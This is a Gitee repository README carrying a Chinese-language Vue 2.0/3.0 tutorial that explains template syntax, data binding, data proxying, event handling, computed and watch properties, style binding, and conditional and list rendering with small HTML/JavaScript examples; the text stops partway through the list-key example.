1 Star 0 Fork 1

独立团二营营长张大彪 / Vue2.0+Vue3.0全套教程

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
贡献代码
同步代码
取消
提示: 由于 Git 不支持空文件夾,创建文件夹后会生成空的 .keep 文件
Loading...
README

Vue2.0+Vue3.0全套教程


目录


1.Vue核心-Vue简介-初识


1.1.Vue 简介


1.1.1.官网


1.1.2.介绍与描述

  • Vue 是一套用来构建用户界面的渐进式 JavaScript 框架
    • 构建用户界面:把数据通过某种办法变成用户界面
    • 渐进式:Vue可以自底向上逐层的应用,简单应用只需要一个轻量小巧的核心库,复杂应用可以引入各式各样的Vue插件
  • 作者:尤雨溪
1

1.1.3.Vue 的特点

  1. 遵循MVVM模式

  2. 编码简洁,体积小,运行效率高,适合移动/PC端开发

  3. 它本身只关注 UI,可以引入其它第三方库开发项目

  4. 采用组件化模式,提高代码复用率、且让代码更好维护

    2
  5. 声明式编码,让编码人员无需直接操作DOM,提高开发效率

    3
  • 使用虚拟DOMDiff算法,尽量复用DOM节点
4

1.1.4.与其他 JS 框架的关联

  • 借鉴 angular 的 模板 和 数据绑定 技术
  • 借鉴 react 的 组件化 和 虚拟DOM 技术

1.1.5.Vue 周边库

  • vue-cli:vue 脚手架
  • vue-resource(axios):ajax 请求
  • vue-router:路由
  • vuex:状态管理(它是 vue 的插件但是没有用 vue-xxx 的命名规则)
  • vue-lazyload:图片懒加载
  • vue-scroller:页面滑动相关
  • mint-ui:基于 vue 的 UI 组件库(移动端)
  • element-ui:基于 vue 的 UI 组件库(PC 端)

1.2.初识 Vue


前置工作

  1. 给浏览器安装 Vue Devtools 插件
  2. 标签引入Vue包
  3. 可选)阻止vue在启动时生成生产提示Vue.config.productionTip = false
  4. favicon 需要将页签图标放在项目根路径,重新打开就有了( shift+F5 强制刷新)

初识Vue

  1. 想让Vue工作,就必须创建一个Vue实例,且要传入一个配置对象
  2. root 容器里的代码依然符合html规范,只不过混入了一些特殊的Vue语法
  3. root 容器里的代码被称为Vue模板
  4. Vue 实例与容器是一一对应
  5. 真实开发中只有一个Vue实例,并且会配合着组件一起使用
  6. {{xxx}}中的 xxx 要写 js 表达式,且 xxx 可以自动读取到data中的所有属性 注意区分 :js 表达式 和 js代码(语句) a. 表达式:一个表达式会产生一个值,可以放在任何一个需要值的地方 a a+b demo(1) x === y ? 'a' : 'b' b. js代码(语句) if(){} for(){}
  7. 一旦data中的数据发生变化,那么模板中用到该数据的地方也会自动更新

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <title>初识Vue</title>

        <!-- 引入Vue -->
        <script type="text/javascript" src="../js/vue.js"></script>

    </head>
    <body>

        <!-- 准备好一个容器 -->
        <div id="demo">
            <h1>Hello,{{ name.toUpperCase() }},{{ address }}</h1>
        </div>

        <script type="text/javascript" >
            Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。

            // 创建Vue实例
            new Vue({
                el: '#demo', // el用于指定当前Vue实例为哪个容器服务,值通常为css选择器字符串
                data: {    // data中用于存储数据,数据供el所指定的容器去使用,值暂时先写成一个对象
                    name: 'cess',
                    address: '成都'
                }
            })
        </script>
    </body>
</html>
5

2.Vue核心-模板语法-数据绑定


1.3.模板语法


Vue 模板语法包括两大类

  1. 插值语法 功能:用于解析标签体内容 写法:{{xxx}} ,xxx 是 js 表达式,可以直接读取到 data 中的所有区域
  2. 指令语法 功能:用于解析标签(包括:标签属性、标签体内容、绑定事件…) 举例:<a v-bind:href="xxx"> 或简写为 <a :href="xxx">,xxx 同样要写 js 表达式,可以直接读取到 data 中的所有属性 备注:Vue 中有很多的指令,且形式都是 v-xxx,此处只是拿v-bind举例
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <title>模板语法</title>
        <!-- 引入Vue -->
        <script type="text/javascript" src="../js/vue.js"></script>
    </head>
    <body>

        <div id="root">
            <h2>插值语法</h2>
            <h4>你好,{{ name }}</h4>
            <hr />
            <h2>指令语法</h2>
            <a v-bind:href="tencent.url.toUpperCase()" x="hello">点我去看{{ tencent.name }}1</a>
            <a :href="tencent.url" x="hello">点我去看{{ tencent.name }}2</a>
        </div>
    </body>

    <script type="text/javascript">
        Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。

        new Vue({
            el: '#root',
            data: {
                name: 'jack',
                tencent: {
                    name: '开端',
                    url: 'https://v.qq.com/x/cover/mzc00200mp8vo9b/n0041aa087e.html',
                }
            }
        })
    </script>
</html>
1

1.4.数据绑定


Vue 中有2种数据绑定的方式 a. 单向绑定v-bind数据只能从 data 流向页面 b. 双向绑定v-model数据不仅能从 data 流向页面,还可以从页面流向 data 备注 a. 双向绑定一般都应用在表单类元素上,如 <input> <select> <textarea> 等 b. v-model:value 可以简写为 v-model ,因为 v-model 默认收集的就是 value

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <title>数据绑定</title>
        <!-- 引入Vue -->
        <script type="text/javascript" src="../js/vue.js"></script>
    </head>
    <body>

        <div id="root">
            <!-- 普通写法 -->
            <!-- 单向数据绑定:<input type="text" v-bind:value="name"><br/> -->
            <!-- 双向数据绑定:<input type="text" v-model:value="name"><br/> -->

            <!-- 简写 -->
            单向数据绑定:<input type="text" :value="name"><br/>
            双向数据绑定:<input type="text" v-model="name"><br/>

            <!-- 如下代码是错误的,因为 v-model 只能应用在表单类元素(输入类元素)上 -->
            <!-- <h2 v-model:x="name">你好啊</h2> -->
        </div>

        <script type="text/javascript">
            Vue.config.productionTip = false // 阻止 vue 在启动时生成生产提示。

            new Vue({
                el: '#root',
                data: {
                    name: 'cess'
                }
            })
        </script>
    </body>
</html>
2

3.Vue核心-el与data的两种写法


1.5.el 与 data 的两种写法


el 有2种写法

a. 创建Vue实例对象的时候配置el属性 b. 先创建Vue实例,随后再通过vm.$mount('#root')指定el的值

data 有2种写法

a. 对象式:data: { } b. 函数式:data() { return { } }

如何选择:目前哪种写法都可以,以后到组件时,data 必须使用函数,否则会报错

一个重要的原则

Vue 管理的函数,一定不要写箭头函数 ,否则 this 就不再是 Vue 实例了

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <title>el与data的两种写法</title>
        <!-- 引入Vue -->
        <script type="text/javascript" src="../js/vue.js"></script>
    </head>

    <body>
        <div id="root">
            <h1>你好,{{name}}</h1>
        </div>
    </body>

    <script type="text/javascript">
        Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。

        // el的两种写法
        // const v = new Vue({
        //  //el:'#root', // 第一种写法
        //  data: {
        //   name:'cess'
        //  }
        // })
        // console.log(v)
        // v.$mount('#root') // 第二种写法

        // data的两种写法
        new Vue({
            el: '#root',
            // data的第一种写法:对象式
            // data:{
            //  name:'cess'
            // }

            //data的第二种写法:函数式
            data() {
                console.log('@@@', this) // 此处的this是Vue实例对象
                return {
                    name: 'cess'
                }
            }
        })
    </script>
</html>

4.Vue核心-MVVM模型-数据代理


1.6.MVVM 模型

1

MVVM模型:

  • M:模型 Modeldata 中的数据
  • V:视图 View ,模板代码
  • VM:视图模型 ViewModelVue实例

观察发现

  • data 中所有的属性,最后都出现在了 vm 身上
  • vm 身上所有的属性 及 Vue原型 身上所有的属性,在 Vue模板 中都可以直接使用

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>mvvm</title>
    <script src="../js/vue.js"></script>
</head>
<body>

    <div id="root">
        <h2>名称:{{ name }}</h2>
        <h2>战队:{{ rank }}</h2>
        <h2>测试:{{ $options }}</h2>
    </div>

    <script>
        Vue.config.productionTip = false
        new Vue({
            el: '#root',
            data: {
                name: 'uzi',
                rank: 'RNG'
            }
        })
    </script>
</body>
</html>
2

1.7.Vue 中的数据代理


Object.defineProperty 方法

let number = 18
let person = {
  name: '张三',
  sex: '',
}

Object.defineProperty(person, 'age', {
  // value:18,
  // enumerable:true,  // 控制属性是否可以枚举,默认值是false
  // writable:true,   // 控制属性是否可以被修改,默认值是false
  // configurable:true // 控制属性是否可以被删除,默认值是false

  // 当有人读取person的age属性时,get函数(getter)就会被调用,且返回值就是age的值
  get() {
    console.log('有人读取age属性了')
    return number
  },

  // 当有人修改person的age属性时,set函数(setter)就会被调用,且会收到修改的具体值
  set(value) {
    console.log('有人修改了age属性,且值是', value)
    number = value
  }

})
// console.log(Object.keys(person))
console.log(person)

数据代理:通过一个对象代理对另一个对象中属性的操作(读/写)

let obj = { x: 100 }
let obj2 = { y: 200 }

Object.defineProperty(obj2, 'x', {
  get() {
    return obj.x
  },
  set(value) {
    obj.x = value
  }
})
  1. Vue 中的数据代理通过 vm 对象来代理 data 对象中属性的操作(读/写)
  2. Vue 中数据代理的好处:更加方便的操作 data 中的数据
  3. 基本原理 a. 通过 object.defineProperty()data 对象中所有属性添加到 vm上 b. 为每一个添加到 vm 上的属性,都指定一个 getter setter c. 在 getter setter 内部去操作(读/写)data 中对应的属性
3

Vuedata 中的数据拷贝了一份到 _data 属性中,又将 _data 里面的属性提到 Vue 实例中(如name),通过 defineProperty 实现数据代理,这样通过 getter/setter 操作 name,进而操作 _data 中的 name。而 _data 又对 data 进行数据劫持,实现响应式

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <title>Vue中的数据代理</title>
        <!-- 引入Vue -->
        <script type="text/javascript" src="../js/vue.js"></script>
    </head>
    <body>

        <div id="root">
            <h2>学校名称:{{ name }}</h2>
            <h2>学校地址:{{ address }}</h2>
        </div>

        <script type="text/javascript">
            Vue.config.productionTip = false

            const vm = new Vue({
                el: '#root',
                data: {
                    name: '电子科技大学',
                    address: '成都'
                }
            })
        </script>
    </body>
</html>

5.Vue核心-事件处理


1.8.事件处理


1.8.1.事件的基本用法

  1. 使用 v-on:xxx@xxx 绑定事件,其中 xxx 是事件名
  2. 事件的回调需要配置在 methods 对象中,最终会在 vm
  3. methods 中配置的函数,不要用箭头函数 ,否则 this 就不是 vm
  4. methods 中配置的函数,都是被 Vue 所管理的函数,this 的指向是 vm或组件实例对象
  5. @click="demo"@click="demo($event)" 效果一致,但后者可以传参
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <title>事件的基本使用</title>
        <!-- 引入Vue -->
        <script type="text/javascript" src="../js/vue.js"></script>
    </head>
    <body>

        <div id="root">
            <h2>欢迎来看{{name}}的笔记</h2>
            <!-- <button v-on:click="showInfo">点我提示信息</button> -->
            <button @click="showInfo1">点我提示信息1(不传参)</button>
            <button @click="showInfo2($event,66)">点我提示信息2(传参)</button>
        </div>

        <script type="text/javascript">
            Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。

            const vm = new Vue({
                el: '#root',
                data: {
                    name: 'cess',
                },
                methods: {
                    showInfo1(event) {
                    console.log(event.target.innerText)
                    // console.log(this) // 此处的this是vm
                    alert('同学你好!')
                    },
                    showInfo2(event, number) {
                        console.log(event, number)
                        console.log(event.target.innerText)
                        // console.log(this) // 此处的this是vm
                        alert('同学你好!!')
                    }
                }
            })
        </script>
    </body>
</html>
1

1.8.2.事件修饰符

Vue 中的事件修饰符

  1. prevent 阻止默认事件(常用)
  2. stop 阻止事件冒泡(常用)
  3. once 事件只触发一次(常用)
  4. capture 使用事件的捕获模式
  5. self 只有event.target是当前操作的元素时才触发事件
  6. passive 事件的默认行为立即执行,无需等待事件回调执行完毕 修饰符可以连续写,比如可以这么用:@click.prevent.stop="showInfo"

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <title>事件修饰符</title>
        <!-- 引入Vue -->
        <script type="text/javascript" src="../js/vue.js"></script>
        <style>
            * {margin-top: 20px;}
            .demo1 {height: 50px;background-color: skyblue;}
            .box1 {padding: 5px;background-color: skyblue;}
            .box2 {padding: 5px;background-color: white;}
            .list {width: 200px;height: 200px;background-color: skyblue;overflow: auto;}
            li {height: 100px;}
        </style>
    </head>
    <body>

    <div id="root">
        <h2>欢迎来到{{ name }}学习</h2>
        <!-- 阻止默认事件(常用) -->
        <a href="http://www.atguigu.com" @click.prevent="showInfo">点我提示信息</a>

        <!-- 阻止事件冒泡(常用) -->
        <div class="demo1" @click="showInfo">
            <button @click.stop="showInfo">点我提示信息</button>
            <!-- 修饰符可以连续写 -->
            <!-- <a href="http://www.qq.com" @click.prevent.stop="showInfo">点我提示</a> -->
        </div>

        <!-- 事件只触发一次(常用) -->
        <button @click.once="showInfo">点我提示信息</button>

        <!-- 使用事件的捕获模式 -->
        <div class="box1" @click.capture="showMsg(1)">
            div1
            <div class="box2" @click="showMsg(2)">
                div2
            </div>
        </div>

        <!-- 只有event.target是当前操作的元素时才触发事件; -->
        <div class="demo1" @click.self="showInfo">
            <button @click="showInfo">点我提示信息</button>
        </div>

        <!-- 事件的默认行为立即执行,无需等待事件回调执行完毕; -->
        <!-- scroll是滚动条滚动,passsive没有影响 -->
        <!-- wheel是鼠标滚轮滚动,passive有影响 -->
        <ul @wheel.passive="demo" class="list">
            <li>1</li>
            <li>2</li>
            <li>3</li>
            <li>4</li>
        </ul>
    </div>

    <script type="text/javascript">
        Vue.config.productionTip = false

        new Vue({
            el: '#root',
            data: {
                name: '尚硅谷'
            },
            methods: {
                showInfo(e) {
                    alert('同学你好!')
                    // console.log(e.target)
                },
                showMsg(msg) {
                    console.log(msg)
                },
                demo() {
                    for (let i = 0; i < 100000; i++) {
                        console.log('#')
                    }
                    console.log('累坏了')
                }
            }
        })
    </script>
    </body>
</html>

1.8.3.键盘事件


键盘上的每个按键都有自己的名称和编码,例如:Enter(13)。而Vue还对一些常用按键起了别名方便使用

  1. Vue 中常用的按键别名 回车 enter 删除 delete 捕获“删除”和“退格”键 退出 esc 空格 space 换行 tab 特殊,必须配合 keydown 去使用 上 updownleftright
  2. Vue 未提供别名的按键,可以使用按键原始的 key 值去绑定,但注意要转为 kebab-case(多单词小写短横线写法)
  3. 系统修饰键(用法特殊) ctrl alt shift metameta 就是 win 键) a. 配合 keyup 使用:按下修饰键的同时,再按下其他键,随后释放其他键,事件才被触发 指定 ctr+y 使用 @keyup.ctr.y b. 配合 keydown 使用:正常触发事件
  4. 也可以使用 keyCode 去指定具体的按键(不推荐)
  5. Vue.config.keyCodes.自定义键名 = 键码 ,可以去定制按键别名
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <title>键盘事件</title>
        <!-- 引入Vue -->
        <script type="text/javascript" src="../js/vue.js"></script>
    </head>
    <body>

        <div id="root">
            <h2>欢迎打开{{name}}笔记</h2>
            <input type="text" placeholder="按下回车提示输入" @keyup.enter="showInfo"><br/>
            <input type="text" placeholder="按下tab提示输入" @keydown.tab="showInfo"><br/>
            <input type="text" placeholder="按下回车提示输入" @keydown.huiche="showInfo"><br/>
        </div>

        <script type="text/javascript">
            Vue.config.productionTip = false // 阻止 vue 在启动时生成生产提示。
            Vue.config.keyCodes.huiche = 13  // 定义了一个别名按键

            new Vue({
                el: '#root',
                data: {
                    name: 'cess'
                },
                methods: {
                    showInfo(e) {
                        // console.log(e.key,e.keyCode)
                        console.log(e.target.value)
                    }
                },
            })
        </script>
    </body>
</html>

6.Vue核心 计算属性 侦听属性


1.9.计算属性


  1. 差值语法实现

    <title>姓名案例_插值语法实现</title>
    <script type="text/javascript" src="../js/vue.js"></script>
    
    <div id="root">
        姓:<input type="text" v-model="firstName"> <br/>
        名:<input type="text" v-model="lastName"> <br/>
        全名:<span>{{ firstName }}-{{ lastName }}</span>
    </div>
    
    <script type="text/javascript">
        Vue.config.productionTip = false
        new Vue({
            el:'#root',
            data:{
                firstName:'',
                lastName:''
            }
        })
    </script>
    1
  2. method 实现

    数据发生变化,模板就会被重新解析

    <title>姓名案例_methods实现</title>
    
    <script type="text/javascript" src="../js/vue.js"></script>
    
    <div id="root">
        姓:<input type="text" v-model="firstName"><br/>
        名:<input type="text" v-model="lastName"><br/>
        全名:<span>{{ fullName() }}</span>
    </div>
    
    <script type="text/javascript">
        Vue.config.productionTip = false
        new Vue({
            el: '#root',
            data: {
                firstName: '',
                lastName: ''
            },
            methods: {
                fullName() {
                    return this.firstName + '-' + this.lastName
                }
            },
        })
    </script>
  3. computed计算属性

    1. 定义:要用的属性不存在, 需要通过已有属性计算得来
    2. 原理:底层借助了 Objcet.defineproperty() 方法提供的 gettersetter
    3. get函数什么时候执行? a. 初次读取时会执行一次 b. 当依赖的数据发生改变时会被再次调用
    4. 优势:与 methods 实现相比,内部有缓存机制(复用) ,效率更高,调试方便
    5. 备注 a. 计算属性最终会出现在vm上,直接读取使用即可 b. 如果计算属性要被修改,那必须写 set函数去响应修改 ,且 set 中要引起计算时依赖的数据发生改变 c. 如果计算属性确定不考虑修改,可以使用计算属性的简写形式
    <title>姓名案例_计算属性实现</title>
    
    <script type="text/javascript" src="../js/vue.js"></script>
    
    <div id="root">
        姓:<input type="text" v-model="firstName"> <br/>
        名:<input type="text" v-model="lastName"> <br/>
        测试:<input type="text" v-model="x"> <br/> // 这里修改 不会调 fullName的get方法
        全名:<span>{{fullName}}</span> <br/>
        <!-- 全名:<span>{{fullName}}</span> <br/> -->
        <!-- 全名:<span>{{fullName}}</span> <br/> -->
    </div>
    
    <script type="text/javascript">
        Vue.config.productionTip = false
        const vm = new Vue({
            el: '#root',
            data: {
                firstName:'',
                lastName:'',
                x:'你好'
            },
            computed: {
                //完整写法
                // fullName: {
                //  get() {
                //   console.log('get被调用了')
                //   return this.firstName + '-' + this.lastName
                //  },
                //  set(value) {
                //   console.log('set', value)
                //   const arr = value.split('-')
                //   this.firstName = arr[0]
                //   this.lastName = arr[1]
                //  }
                // }
    
                // 简写
                fullName() {
                    console.log('get被调用了')
                    return this.firstName + '-' + this.lastName
                }
            }
    
        })
    
    </script>

1.10.侦听属性


<title>天气案例</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h3>今天天气很{{ info }}</h3>
    <!-- 绑定事件的时候:@xxx="yyy" yyy可以写一些简单的语句 -->
    <!-- <button @click="isHot = !isHot">切换天气</button> -->
    <button @click="changeWeather">切换天气</button>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    const vm = new Vue({
        el:'#root',
        data:{
            isHot:true,
        },
        computed:{
            info(){
                return this.isHot ? '炎热' : '凉爽'
            }
        },
        methods: {
            changeWeather(){
                this.isHot = !this.isHot
            }
        }
    })
</script>
2

1.10.1.侦听属性基本用法

watch 监视属性

  1. 当被监视的属性变化时,回调函数自动调用,进行相关操作
  2. 监视的属性必须存在,才能进行监视,既可以监视data,也可以监视计算属性
  3. 配置项属性 immediate:false改为 true ,则初始化时调用一次 handler(newValue,oldValue)
  4. 监视有两种写法 a. 创建 Vue 时传入 watch: {} 配置 b. 通过 vm.$watch() 监视
<title>天气案例_监视属性</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
  <h2>今天天气很{{info}}</h2>
  <button @click="changeWeather">切换天气</button>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    const vm = new Vue({
        el: '#root',
        data: {
            isHot: true,
        },
        computed: {
            info() {
                return this.isHot ? '炎热' : '凉爽'
            }
        },
        methods: {
            changeWeather() {
                this.isHot = !this.isHot
            }
        },
        // 方式一
        /* watch:{
                isHot:{
                    immediate:true,
                    handler(newValue,oldValue){
                        console.log('isHot被修改了',newValue,oldValue)
                    }
                }
            } */
    })
    // 方式二
    vm.$watch('isHot', {
        immediate: true, // 初始化时让handler调用一下
        //handler什么时候调用?当isHot发生改变时
        handler(newValue, oldValue) {
            console.log('isHot被修改了', newValue, oldValue)
        }
    })
</script>

1.10.2.深度侦听

  1. Vue中的watch默认不监测对象内部值的改变(一层)
  2. 在watch中配置 deep:true 可以监测对象内部值的改变(多层)

注意

  1. Vue自身可以监测对象内部值的改变,但Vue提供的watch默认不可以
  2. 使用watch时根据监视数据的具体结构,决定是否采用深度监视
<title>天气案例_深度监视</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h3>a的值是:{{ numbers.a }}</h3>
    <button @click="numbers.a++">点我让a+1</button>
    <h3>b的值是:{{ numbers.b }}</h3>
    <button @click="numbers.b++">点我让b+1</button>
    <button @click="numbers = {a:666,b:888}">彻底替换掉numbers</button>
    {{numbers.c.d.e}}
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    const vm = new Vue({
        el: '#root',
        data: {
            isHot: true,
            numbers: {
                a: 1,
                b: 1,
                c: {
                    d: {
                        e: 100
                    }
                }
            }
        },
        watch: {
            // 监视多级结构中某个属性的变化
            /* 'numbers.a':{
                    handler(){
                        console.log('a被改变了')
                    }
                } */
            // 监视多级结构中所有属性的变化
            numbers: {
                deep: true,
                handler() {
                    console.log('numbers改变了')
                }
            }
        }
    })
</script>
3

1.10.3.侦听属性简写

如果监视属性除了handler没有其他配置项的话,可以进行简写

<title>天气案例_监视属性_简写</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h3>今天天气很{{ info }}</h3>
    <button @click="changeWeather">切换天气</button>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    const vm = new Vue({
        el: '#root',
        data: {isHot: true,},
        computed: {info() {return this.isHot ? '炎热' : '凉爽'}},
        methods: {changeWeather() {this.isHot = !this.isHot}},
        watch: {
            // 正常写法
            // isHot: {
            //  // immediate:true, //初始化时让handler调用一下
            //  // deep:true, //深度监视
            //  handler(newValue, oldValue) {
            //   console.log('isHot被修改了', newValue, oldValue)
            //  }
            // },

            //简写
            isHot(newValue, oldValue) {
                console.log('isHot被修改了', newValue, oldValue, this)
            }
        }
    })

    //正常写法
    // vm.$watch('isHot', {
    //  immediate: true, //初始化时让handler调用一下
    //  deep: true,//深度监视
    //  handler(newValue, oldValue) {
    //   console.log('isHot被修改了', newValue, oldValue)
    //  }
    // })l

    //简写
    // vm.$watch('isHot', (newValue, oldValue) => {
    //  console.log('isHot被修改了', newValue, oldValue, this)
    // })
</script>

1.10.4.计算属性 VS 侦听属性

computedwatch 之间的区别

  • computed 能完成的功能, watch 都可以完成
  • watch 能完成的功能, computed 不一定能完成,例如 watch 可以进行异步操作

两个重要的小原则

  • 所有被 Vue 管理的函数,最好写成普通函数,这样 this 的指向才是 vm 或组件实例对象
  • 所有不被 Vue 所管理的函数(定时器的回调函数、 ajax 的回调函数等、 Promise 的回调函数),最好写成箭头函数,这样 this 的指向才是 vm 或组件实例对象
4

使用计算属性:

new Vue({
    el:'#root',
    data:{
        firstName:'',
        lastName:''
    },
    computed:{
        fullName(){
            return this.firstName + '-' + this.lastName
        }
    }
})

使用监听属性:

new Vue({
    el:'#root',
    data:{
        firstName:'',
        lastName:'',
        fullName:'张-三'
    },
    watch:{
        firstName(val){
            setTimeout(()=>{
                this.fullName = val + '-' + this.lastName
            },1000);
        },
        lastName(val){
            this.fullName = this.firstName + '-' + val
        }
    }
})

7.Vue核心 绑定样式 条件渲染


1.11.绑定样式


class 样式

  • 写法::class="xxx" ,xxx 可以是字符串、数组、对象
  • :style="[a,b]" 其中a、b是样式对象
  • :style="{fontSize: xxx}" 其中 xxx 是动态值
    • 字符串写法适用于:类名不确定,要动态获取
    • 数组写法适用于:要绑定多个样式,个数不确定,名字也不确定
    • 对象写法适用于:要绑定多个样式,个数确定,名字也确定,但不确定用不用
<style>
  .basic {width: 300px;height: 50px;border: 1px solid black;}
  .happy {border: 3px solid red;background-color: rgba(255, 255, 0, 0.644);
    background: linear-gradient(30deg, yellow, pink, orange, yellow);}
  .sad {border: 4px dashed rgb(2, 197, 2);background-color: skyblue;}
  .normal {background-color: #bfa;}
  .atguigu1 {background-color: yellowgreen;}
  .atguigu2 {font-size: 20px;text-shadow: 2px 2px 10px red;}
  .atguigu3 {border-radius: 20px;}
</style>

<div id="root">
  <!-- 绑定class样式--字符串写法,适用于:样式的类名不确定,需要动态指定 -->
  <div class="basic" :class="mood" @click="changeMood">{{name}}</div><br/><br/>

  <!-- 绑定class样式--数组写法,适用于:要绑定的样式个数不确定、名字也不确定 -->
  <div class="basic" :class="classArr">{{name}}</div><br/><br/>

  <!-- 绑定class样式--对象写法,适用于:要绑定的样式个数确定、名字也确定,但要动态决定用不用 -->
  <div class="basic" :class="classObj">{{name}}</div><br/><br/>

  <!-- 绑定style样式--对象写法 -->
  <div class="basic" :style="styleObj">{{name}}</div><br/><br/>

  <!-- 绑定style样式--数组写法 -->
  <div class="basic" :style="styleArr">{{name}}</div>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false

    const vm = new Vue({
        el: '#root',
        data: {
            name: '尚硅谷',
            mood: 'normal',
            classArr: ['atguigu1', 'atguigu2', 'atguigu3'],
            classObj: {
                atguigu1: false,
                atguigu2: false,
            },
            styleObj: {
                fontSize: '40px',
                color: 'red',
            },
            styleObj2: {
                backgroundColor: 'orange'
            },
            styleArr: [
                {
                    fontSize: '40px',
                    color: 'blue',
                },
                {
                    backgroundColor: 'gray'
                }
            ]
        },
        methods: {
            changeMood() {
                const arr = ['happy', 'sad', 'normal']
                const index = Math.floor(Math.random() * 3)
                this.mood = arr[index]
            }
        },
    })
</script>
1

1.12.条件渲染


v-if:

  • 写法 跟 if else 语法类似 v-if="表达式" v-else-if="表达式" v-else
  • 适用于:切换频率较低的场景,因为不展示的 DOM 元素直接被移除
  • 注意:v-if 可以和 v-else-if v-else 一起使用,但要求结构不能被打断

v-show:

  • 写法:v-show="表达式"
  • 适用于:切换频率较高的场景
  • 特点:不展示的 DOM 元素未被移除,仅仅是使用样式隐藏掉display: none

备注: 使用 v-if 的时,元素可能无法获取到,而使用 v-show 一定可以获取到 template 标签不影响结构,页面 html 中不会有此标签,但只能配合 v-if ,不能配合 v-show

<title>条件渲染</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h2>当前的n值是:{{ n }}</h2>
    <button @click="n++">点我n+1</button>

    <!-- 使用v-show做条件渲染 -->
    <!-- <h2 v-show="false">欢迎来到{{name}}</h2> -->
    <!-- <h2 v-show="1 === 1">欢迎来到{{name}}</h2> -->

    <!-- 使用v-if做条件渲染 -->
    <!-- <h2 v-if="false">欢迎来到{{name}}</h2> -->
    <!-- <h2 v-if="1 === 1">欢迎来到{{name}}</h2> -->

    <!-- v-else和v-else-if -->
    <!-- <div v-show="n === 1">Angular</div> -->
    <!-- <div v-show="n === 2">React</div> -->
    <!-- <div v-show="n === 3">Vue</div> -->

    <!-- <div v-if="n === 1">Angular</div> -->
    <!-- <div v-else-if="n === 2">React</div> -->
    <!-- <div v-else-if="n === 3">Vue</div> -->
    <!-- <div v-else>哈哈</div> -->


    <!-- v-if与template的配合使用 -->
    <template v-if="n === 1">
        <h3>你好</h3>
        <h3>尚硅谷</h3>
        <h3>北京</h3>
    </template>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    const vm = new Vue({
        el:'#root',
        data:{
            name:'尚硅谷',
            n:0
        }
    })
</script>

8.Vue核心 列表渲染 数据监视


1.13.列表渲染


1.13.1.基本列表

v-for 指令

  • 用于展示列表数据
  • 语法:
  • ,这里key可以是index,更好的是遍历对象的唯一标识
  • 可遍历:数组、对象、字符串(用的少)、指定次数(用的少)
<title>基本列表</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <!-- 遍历数组 -->
    <h3>人员列表(遍历数组)</h3>
    <ul>
        <li v-for="(p,index) of persons" :key="index">{{ p.name }}-{{ p.age }}</li>
    </ul>

    <!-- 遍历对象 -->
    <h3>汽车信息(遍历对象)</h3>
    <ul>
        <li v-for="(value,k) of car" :key="k">{{ k }}-{{ value }}</li>
    </ul>

    <!-- 遍历字符串 -->
    <h3>测试遍历字符串(用得少)</h3>
    <ul>
        <li v-for="(char,index) of str" :key="index">{{ char }}-{{ index }}</li>
    </ul>

    <!-- 遍历指定次数 -->
    <h3>测试遍历指定次数(用得少)</h3>
    <ul>
        <li v-for="(number,index) of 5" :key="index">{{ index }}-{{ number }}</li>
    </ul>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({
    el: '#root',
        data: {
            persons: [
                { id: '001', name: '张三', age: 18 },
                { id: '002', name: '李四', age: 19 },
                { id: '003', name: '王五', age: 20 }
            ],
            car: {
                name: '奥迪A8',
                price: '70万',
                color: '黑色'
            },
            str: 'hello'
        }
  })
</script>
1

1.13.2.key 的作用与原理

原理:

2 3

面试题: react vue 中的 key 有什么作用?(key的内部原理)

  1. 虚拟DOMkey 的作用:key是虚拟DOM中对象的标识,当数据发生变化时,Vue会根据新数据生成新的虚拟DOM,随后Vue进行新虚拟DOM与旧虚拟DOM的差异比较 ,比较规则如下
  2. 对比规则 a. 旧虚拟DOM 中找到了与 新虚拟DOM 相同的 key ⅰ. 若 虚拟DOM中 内容没变, 直接使用之前的 真实DOM ⅱ. 若 虚拟DOM 中内容变了, 则生成新的 真实DOM ,随后替换掉页面中之前的 真实DOM b. 旧 虚拟DOM 中未找到与新 虚拟DOM 相同的 key 创建新的 真实DOM ,随后渲染到到页面
  3. index 作为 key 可能会引发的问题 a. 若对数据进行逆序添加、逆序删除等 破坏顺序操作 ,会产生没有必要的 真实DOM更新 ==> 界面效果没问题,但效率低 b. 若结构中还包含 输入类的DOM :会产生错误DOM更新 ==> 界面有问题
  4. 开发中如何选择key? a. 最好使用每条数据的 唯一标识作为key ,比如 id、手机号、身份证号、学号等唯一值 b. 如果不存在对数据的逆序添加、逆序删除等破坏顺序的操作,仅用于渲染列表,使用 index 作为 key 是没有问题的
<title>key的原理</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
  <h2>人员列表(遍历数组)</h2>
  <button @click.once="add">添加一个老刘</button>
